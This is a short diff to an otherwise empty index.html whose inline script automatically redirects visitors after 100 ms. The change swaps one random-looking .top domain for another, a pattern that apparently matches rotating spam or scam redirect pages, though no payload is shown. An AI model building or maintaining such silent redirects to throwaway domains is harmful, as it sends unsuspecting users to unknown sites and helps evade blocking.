--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
 </head>
 <body>
   <script>
-  window.page = 'https://wwshangliaoil.top/';
+  window.page = 'https://wwangslyrmeky.top/';
   setTimeout(() => location.href=window.page, 100);
   </script>
 </body>
